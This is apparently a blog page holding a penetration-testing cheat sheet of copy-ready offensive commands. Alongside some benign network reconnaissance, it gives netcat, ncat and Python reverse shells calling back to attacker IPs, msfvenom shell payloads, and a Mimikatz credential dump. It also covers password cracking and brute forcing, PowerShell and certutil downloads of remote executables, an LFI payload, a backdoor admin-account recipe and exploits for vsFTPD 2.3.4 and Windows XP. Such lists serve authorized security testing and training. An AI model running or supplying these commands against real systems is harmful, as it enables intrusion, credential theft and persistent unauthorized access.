Blog
Search…
Hacking cheatsheet
Hacking command list

Netcat

Connect to port
1
nc -nv 192.168.1.10 110
Copied!
Bind port and connect to:
1
nc -nlvp 4444
2
nc -nv 192.168.1.10 4444
Copied!
Copy files
1
nc -nlvp 4444 > dest-file
2
nc -nv 192.168.1.10 4444 < local-file
Copied!
Bind shell and remote execution
1
nc -nlvp 4444 -e cmd.exe
2
nc -nv 192.168.1.10 4444
Copied!
Reverse shell
1
nc -nlvp 4444
2
nc -nv 192.168.1.10 4444 -e /bin/bash
Copied!
Scan ports
1
nc -nvv -w 1 -z 192.168.1.10 3388-3390
Copied!

Ncat

Bind shell SSL with allow IP address
1
ncat --exec cmd.exe --allow 192.168.1.11 -vnl 4444 --ssl
2
ncat -v 192.168.1.10 4444 --ssl
Copied!
Reverse shell SSL
1
ncat -vnl 4444 --ssl
2
ncat -nv 192.168.1.10 4444 --ssl --exec /bin/bash
Copied!

Tcpdump

Load a .pcap file
1
tcpdump -r file.pcap
Copied!
Filter by source host
1
tcpdump -n src host 172.16.40.10
Copied!
Filter by destination host
1
tcpdump -n dst host 172.16.40.10
Copied!
Filter by port
1
tcpdump -n port 80
Copied!
Print packet data in HEX and ASCI
1
tcpdump -nXX
Copied!
Packets with ACK or PSH flags set
1
tcpdump -A -n 'tcp[13] = 24'
Copied!
Print HEX data on an 1500 MTU card
1
tcpdump -i tap0 -nXX -s 1500 port 110
Copied!

The harvester

Search all sources for email
1
theharvester -d domain.com -b all
Copied!
Search employees on linkedin
1
theharvester -d domain.com -b linkedin
Copied!
Search emails and query hosts in shodan
1
theharvester -d domain.com -b bing -h
Copied!

host

Find name servers
1
host -t ns domain.com
Copied!
Find mail servers
1
host -t mx domain.com
Copied!
Find address and mail servers
1
host domain.com
Copied!
Reverse lookup
1
host 1.2.3.4
Copied!
Transfer DNS zone
1
host -l domain.com domain-nameserver.com
Copied!
Try all NS DNS zone transfer
1
HOST=host.com; for ns in $(host -t ns $HOST | awk '{print $4}'); do host -l $HOST $ns | grep "has address" ; done
Copied!

dnsrecon

Try DNS zone transfer
1
dnsrecon -d domain.com -t axfr
Copied!

dnsenum

Enumerate host in a domain
1
dnsenum domain.com
Copied!

Nmap

TCP syn/ack scan
1
nmap -sT 10.11.11.123
Copied!
Scan all ports
1
nmap -sS 1.1.1.1 -p-
Copied!
Identify host in the network (ICMP)
1
nmap -sn -v 10.11.1.1-254 -oG host.txt
Copied!
Scan port 80 on all hosts
1
nmap -p 80 10.11.1.1-254 -oG web-host.txt
Copied!
OS, port, version, traceroute and script scan of top 20 port in a range
1
nmap -sT -A -top-ports=20 10.11.1.1-254 -oG top-ports.txt
Copied!
OS scan
1
nmap -O 10.11.11.123
Copied!
Service Version scan
1
nmap -sV -sT 10.11.11.123
Copied!
Script discover nsb and host version
1
nmap 10.11.11.123 -p 139,445 --script smb-os-discovery.nse
Copied!
Script DNS zone transfer
1
nmap --script dns-zone-transfer -p 53 ns2.domain.com
Copied!
Scan for smb services (139-netbios,445-microsoft-ds)
1
nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254
Copied!
Enum http path
1
nmap -v -p 80 192.168.56.101 --script http-enum.ns
Copied!

SMB

Discover SMB hosts in a network, get IP, NetBIOS name and users
1
nbtscan -r 10.11.1.0/24
Copied!
Discover SMB host info
1
enum4linux -a 10.11.1.227
Copied!
Search specific vulnerability
1
nmap -v -p139,445 --script smb-vuln-ms08-067 --script-args=unsafe=1 10.13.10.4
Copied!
Enumerate shares
1
nmap --script smb-enum-shares 10.13.10.4 -p139,445 -T4
Copied!
Map smb shares
1
smbmap -H 10.14.15.16 -u guest
Copied!
Mount share
1
mount -t cifs -o vers=1.0,username=guest,password="" //10.11.12.13/wwwroot /tmp/path
Copied!

SMTP

Connect smtp
1
nc -nv 192.168.56.101 25
2
# Check if user exists
3
VRFY root
Copied!

SNMP

  • Port: 161
  • Type: UDP
Scan strings [community, public, manager, etc]
1
onesixtyone -c snmp_strings.txt 127.0.0.1
Copied!
Enumerate MIB tree
1
snmpwalk -c public -v1 127.0.0.1
Copied!
Enumerate some SMTP OID
1
snmpwalk -c <COMMUNITY_STRING> <version> <HOST> <OID>
Copied!

msfvenom

PHP reverse shell
1
msfvenom -p php/reverse_php LHOST=10.11.0.49 LPORT=443 -f raw > shell.php
Copied!
Windows bind port (No firewall enabled)
1
msfvenom -p windows/shell_bind_tcp R LPORT=4446 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
Copied!
Microsoft ASP .net reverse shell
1
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=4445 -f asp > shell.asp
Copied!
Create windows executable
1
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.49 LPORT=8080 -f exe -e x86/shikata_ga_nai -i 9 -o httpd.exe
Copied!

GCC / compilation

Regular compilation
1
gcc -o OpenFuck 47080.c -lcrypto
Copied!
Cross compile x86 in x86_64 host
1
gcc -Wall -o <out_file> <exploit.c> -m32 -march=i686 -Wl,--hash-style=both
2
gcc -m32 -Wl,--hash-style=both -o udev udev.c
Copied!

Nikto

Analise web with default settings
1
nikto -host http://10.11.1.10
Copied!

dirb

Scan web service directories and files
1
dirb http://192.168.1.10
Copied!
Scan non recursively, non show attempts and bigger words list
1
dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt -r -S
Copied!

FTP

Non interactive FTP download from windows
1
echo open 10.11.0.49 21 > ftp.txt
2
echo USER xnaaro >> ftp.txt
3
echo 12345>> ftp.txt
4
echo bin >> ftp.txt
5
echo GET wget.exe >> ftp.txt
6
echo bye >> ftp.txt
7
ftp -v -n -s:ftp.txt
Copied!

Mimikatz

Non interactive hash dump
1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit
Copied!

Webserver

Create a python webserver
1
python -m SimpleHTTPServer 80
Copied!

NoSQLmap

1
python nosqlmap.py --attack 2 --victim host.name --webPort 80 --uri / --httpMethod POST --postData username,test_user,password,test_password,login,login --injectedParameter 3 --injectSize 4 --injectFormat 2 --savePath output.log --verb ON
Copied!

NoSQl user/pass enum

1
# Git repository: https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
2
python3 nosqli_enumeration.py -u http://localhost/index.php -up email -pp password -ep password -m POST
Copied!

Searchsploit

Search exploit
1
searchsploit <name>
Copied!
See exploit code
1
searchsploit -x /path/exploit
Copied!
Copy exploit current location
1
searchsploit -m path/exploit
Copied!

John the ripper

Merge passwd and shadow files
1
unshadow /etc/passwd /etc/shadow > unshadow.txt
Copied!
Crack passwords
1
john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadow_pass.txt
Copied!
Crack SSH key passphrase
1
/usr/share/john/ssh2john.py id_rsa > id_rsa.hash
2
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Copied!
Mutate cewl dictionary
1
john --wordlist=cewl_words.txt --rules --stdout > mutated_words
Copied!

hashcat

Crack linux passwords
1
hashcat -m 1800 -O passwd.hash /usr/share/wordlists/rockyou.txt --force
Copied!

File inclusion

LFI example
1
http://10.12.13.14/classes/phpmailer/class.cs_phpmailer.php?classes_dir=/etc/passwd%00
Copied!

Shells

Python interactive bash shell
1
python -c 'import pty;pty.spawn("/bin/bash")'
2
export TERM=xterm && export SHELL=bash
Copied!
Scape restricted shell: -rbash: /usr/bin/python: restricted: cannot specify '/' in command names
1
BASH_CMDS[a]=/bin/sh;a
2
export PATH=$PATH:/bin/
3
export PATH=$PATH:/usr/bin
Copied!
Python reverse shell
1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.49",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Copied!

Mysql

Non interactive queries
1
mysql -u <user> -p<passwd> -D otrs -e "show databases;"
Copied!

Robots.txt

Crawl robots txt as a search engine agent
1
curl --user-agent Googlebot http://10.11.12.13/robots.txt -v
Copied!

Hydra

Generate passwds from web words
1
cewl http://10.11.12.13 -m 2 -w output
Copied!
Brute force logging
1
hydra -L usernames.txt -P passwords.txt <IP> <MODE> "<PATH>:Action=<HTTP_QUERY>&User=^USER^&Password=^PASS^:<ERROR message when fail"
2
# Example
3
hydra -L usernames -P output 10.11.12.13 http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=300&User=^USER^&Password=^PASS^:F=Login"
Copied!

Fuzzing

ffuz

Silent fuzzing
1
ffuf -s -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.168:8080/FUZZ
Copied!

Whatweb

1
$ whatweb http://10.10.10.168:8080
2
http://10.10.10.168:8080 [200 OK] Country[RESERVED][ZZ], Email[[email protected]], HTML5, HTTPServer[BadHTTPServer], IP[10.10.10.168], JQuery, Script, Title[0bscura], X-UA-Compatible[IE=Edge]
3
Copied!

Windows commands

Create admin user with RDP
1
net user xnaaro 12345 /add
2
net localgroup administrators xnaaro /add
3
net localgroup "Remote Desktop Users" xnaaro /add
Copied!
Quick local enumeration
1
echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Documents and Settings\Administrator\Desktop\proof.txt"
Copied!

Downloads

Download file with powershell
  • Option 1
1
echo (New-Object System.Net.WebClient).DownloadFile("http://10.11.0.49/wget.exe", "wget.exe") > wget.ps1
2
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Copied!
  • Option 2
1
PowerShell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.49/wget.exe','wget.exe')
Copied!
Non interactive download
1
echo $storageDir = $pwd > wget.ps1
2
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
3
echo $url = "http://10.11.0.49/wget.exe" >>wget.ps1
4
echo $file = "wget.exe" >>wget.ps1
5
echo $webclient.DownloadFile($url,$file) >>wget.ps1
6
7
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Copied!
Download file with certutil
1
certutil -urlcache -split -f "http://10.11.0.49/wget.exe" wget.exe
Copied!

Windows exploit suggester

Copy systeminfo to local host
1
./windows-exploit-suggester.py --database 2019-11-29-mssb.xls --systeminfo /tmp/systeminfo
Copied!

Well know exploits

Common vulnerabilities

vsFTPD 2.3.4

Exploit and reverse shell
1
python3 vsftpd_234_exploit.py 192.168.56.101 21 "sh -c 'nc -nv 192.168.56.1 44444 -e /bin/bash > /dev/null 2>&1 &'"
Copied!

Windows XP SP1 priv escalation

1
sc config upnphost binpath= "C:\Inetpub\Scripts\nc.exe 10.11.0.49 10000 -e C:\WINDOWS\System32\cmd.exe"
2
sc config upnphost obj= ".\LocalSystem" password= ""
3
sc qc upnphost
4
net start upnphost
Copied!
Last modified 1yr ago